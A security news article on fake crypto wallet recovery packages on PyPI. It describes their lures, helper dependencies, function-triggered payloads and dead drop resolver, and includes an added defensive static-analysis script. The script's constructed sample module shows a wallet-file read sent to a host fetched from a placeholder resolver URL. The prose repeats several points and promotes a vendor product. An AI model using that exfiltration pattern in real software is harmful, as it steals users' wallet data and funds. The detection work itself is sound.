A recent investigation has uncovered several malicious packages in the Python Package Index (PyPI) repository that masquerade as cryptocurrency wallet recovery services while spying on sensitive personal information and helping to steal cryptocurrency.
In a report released on Tuesday, a Checkmarx researcher described the attack as targeting Atomic, Trust Wallet, MetaMask, Ronin, TronLink, Exodus, and many other prominent wallets in the crypto ecosystem.
The packages presented themselves as tools that could extract mnemonic phrases and decrypt wallet data, suggesting that they would be valuable to cryptocurrency users looking to recover or manage wallets.
As long as cryptocurrencies remain a prime target for cybercriminals, campaigns like this one will continue to thrive in the ecosystem.
The recently discovered malicious packages on the Python Package Index (PyPI) repository posed as tools that help recover and manage crypto wallets. In reality they were fake tools used to steal sensitive information from users and to facilitate the theft of valuable digital assets.
According to Checkmarx researchers, several malicious Python packages found on PyPI target users of leading cryptocurrency wallets such as Atomic, Trust Wallet, MetaMask, Ronin, TronLink, and Exodus, as well as other popular apps. The package names, Checkmarx says, were deliberately chosen to lure developers who are active in cryptocurrency ecosystems.
The package descriptions on PyPI also came with links to installation instructions, examples on how to use them, and in one case, even an explanation of the "best practices" for virtual environments for installation. Again, this was meant to lend legitimacy to the libraries.
Furthermore, the threat actor behind the campaign did not stop at deceptive descriptions: the packages also displayed false download statistics, creating the impression that they were trustworthy and popular.
Within the identified PyPI packages, a dependency called cipherbcryptors was required for the malicious code to execute, while in a few other cases the malware relied on ccl_leveldbases, which appears to be an attempt to obfuscate the functionality by hiding it in another package.
Notably, the malicious functionality in these packages is only activated when certain functions are called. This departs from the typical pattern in which such behaviour is triggered automatically as soon as the package is installed.
The captured data is then exfiltrated to a remote server.
As Gelb explains, the attackers added another layer of protection for their infrastructure by not hard-coding the address of their command-and-control server into any of the distributed packages. Instead, the packages retrieve that information dynamically from external sources.
This technique, commonly referred to as a dead drop resolver, gives attackers the flexibility to update the server information without having to update the packages themselves.
Furthermore, should the servers be taken down, it makes switching to new server infrastructure as simple as possible.
The attackers invested considerable effort in their strategy to lure developers and end users. The author of the packages provided a great deal of information about them, including detailed descriptions, installation instructions, usage examples, and even best practices for running virtual environments. They also manipulated download statistics to mislead users into believing the packages were popular and trustworthy.
It is noteworthy that the attackers used the dead drop resolver technique to retrieve the addresses of their command-and-control servers. Because the server addresses are not hard-coded within the packages, the attackers can update them without pushing new package versions, which makes it harder for security measures to detect and block the updated servers.
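The two behaviours described above, malicious code that fires only when a particular function is called, and a dead drop resolver that fetches the command-and-control address from an external page at runtime, can both be surfaced by static triage of a package's source before it is installed. The following Python script is an added example written for this page; it is not code from Checkmarx, the article's author, or the malicious packages. It uses only the standard library `ast` module, and every package source it inspects is a constructed sample (the `paste.invalid` resolver URL is a placeholder, not an address from the campaign). The only values taken from the article are the two helper-package names.

```python
"""Static triage of a Python package for two behaviours from the article:
   1. network activity that happens only inside a function (lazy trigger), and
   2. a dead drop resolver: the target of one request is built from the
      response of an earlier request instead of a hard-coded address.
   The module and setup.py sources at the bottom are constructed samples."""
import ast
import re
from dataclasses import dataclass

# Helper-package names taken from the article (the only page-specific values).
SUSPICIOUS_DEPENDENCIES = {"cipherbcryptors", "ccl_leveldbases"}

# Callee names that make outbound HTTP requests (urllib and requests).
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post", "put", "request"}


@dataclass(frozen=True)
class Finding:
    kind: str      # lazy_network_call | dead_drop_resolver | suspicious_dependency
    lineno: int
    detail: str


def _call_name(node: ast.Call) -> str:
    """Callee name: 'get' for requests.get(...), 'urlopen' for urlopen(...)."""
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    if isinstance(node.func, ast.Name):
        return node.func.id
    return ""


def _network_calls(node: ast.AST) -> list:
    return [n for n in ast.walk(node)
            if isinstance(n, ast.Call) and _call_name(n) in NETWORK_CALLS]


def audit_module(source: str) -> list:
    """Flag lazy network triggers and dead-drop style address resolution."""
    tree = ast.parse(source)
    findings = []

    # 1. Lazy trigger: requests issued only when a function is invoked, so an
    #    install-time or import-time sandbox run observes nothing.
    for func in (n for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)):
        calls = _network_calls(func)
        if calls:
            findings.append(Finding("lazy_network_call", func.lineno,
                f"{func.name}() makes {len(calls)} network call(s) only when invoked"))

    # 2. Dead drop resolver: a name assigned from one network response is later
    #    used to build the target of another request. Name-level heuristic only;
    #    it does not follow data through containers or attributes.
    fetched = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and _network_calls(node.value):
            fetched.update(t.id for t in node.targets if isinstance(t, ast.Name))
    for call in _network_calls(tree):
        used = sorted({n.id for arg in call.args for n in ast.walk(arg)
                       if isinstance(n, ast.Name) and n.id in fetched})
        if used:
            findings.append(Finding("dead_drop_resolver", call.lineno,
                f"target of {_call_name(call)}() derived from fetched value(s) {used}"))
    return findings


def audit_setup(source: str) -> list:
    """Flag install_requires entries that pull in the helper packages named above."""
    tree = ast.parse(source)
    findings = []
    for call in (n for n in ast.walk(tree)
                 if isinstance(n, ast.Call) and _call_name(n) == "setup"):
        for kw in call.keywords:
            if kw.arg != "install_requires":
                continue
            for elt in getattr(kw.value, "elts", []):
                if isinstance(elt, ast.Constant) and isinstance(elt.value, str):
                    # "cipherbcryptors>=1.0" -> "cipherbcryptors"
                    name = re.split(r"[\[<>=!~ ;]", elt.value, maxsplit=1)[0].strip().lower()
                    if name in SUSPICIOUS_DEPENDENCIES:
                        findings.append(Finding("suspicious_dependency", elt.lineno,
                            f"install_requires pulls in {elt.value!r}"))
    return findings


# Constructed samples: a "recovery tool" shaped like the reported packages, and a benign module.
SAMPLE_SETUP = '''
from setuptools import setup
setup(name="wallet-recover-tool", version="1.0",
      install_requires=["requests", "cipherbcryptors>=1.0"])
'''

SAMPLE_MODULE = '''
import requests

# Constructed placeholder: an external page that holds the real address.
RESOLVER_URL = "https://paste.invalid/raw/placeholder"

def recover_wallet(path):
    data = open(path, "rb").read()
    host = requests.get(RESOLVER_URL).text.strip()
    requests.post("https://" + host + "/upload", data=data)
    return len(data)
'''

BENIGN_MODULE = '''
import json

def load_wallet(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    for label, findings in [("setup.py", audit_setup(SAMPLE_SETUP)),
                            ("module", audit_module(SAMPLE_MODULE)),
                            ("benign", audit_module(BENIGN_MODULE))]:
        print(label, "->", [(f.kind, f.lineno) for f in findings] or "clean")
```

Running the script reports the suspicious dependency in the sample setup.py, the lazy trigger on `recover_wallet()` and the dead drop pattern on the `post` call in the sample module, and nothing for the benign module. The checks are deliberately name-level heuristics meant for triage of a candidate package; a reviewer would follow up on each finding by reading the flagged function rather than treating the output as a verdict.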
The recent discovery of fake crypto wallet recovery tools on PyPI underlines how cybercriminals continuously evolve their tactics to target cryptocurrency and the crypto sector as a whole.
Developers and users alike are responsible for safeguarding their digital assets: staying vigilant, practising due diligence when installing software packages, and using security solutions such as Vulert to protect their assets.
According to details revealed in August 2024, CryptoCore, an elaborate cryptocurrency scam that uses fake videos or hijacked accounts on social media platforms such as Facebook, Twitch, X, and YouTube to lure users into parting with their crypto assets under the guise of fast and easy profits, has been operating since August 2024.
"This scam group and its giveaway campaigns will deceive users into sending their cryptocurrencies to the scammers' wallets by using deepfake technology, hijacked YouTube accounts, and professionally designed websites to deceive them into sending their cryptocurrencies to the scammers' wallets," Avast researcher Martin Chlumecký said.
Scammers most commonly convince potential victims by making messages or events published online look like official communications from trusted social media accounts or event pages. They can then profit from the trust attached to the chosen brand, person, or event.
Last week, Check Point revealed that a rogue Android app impersonating the genuine WalletConnect protocol was used to steal around $70,000 in cryptocurrency by initiating fraudulent transactions from infected devices.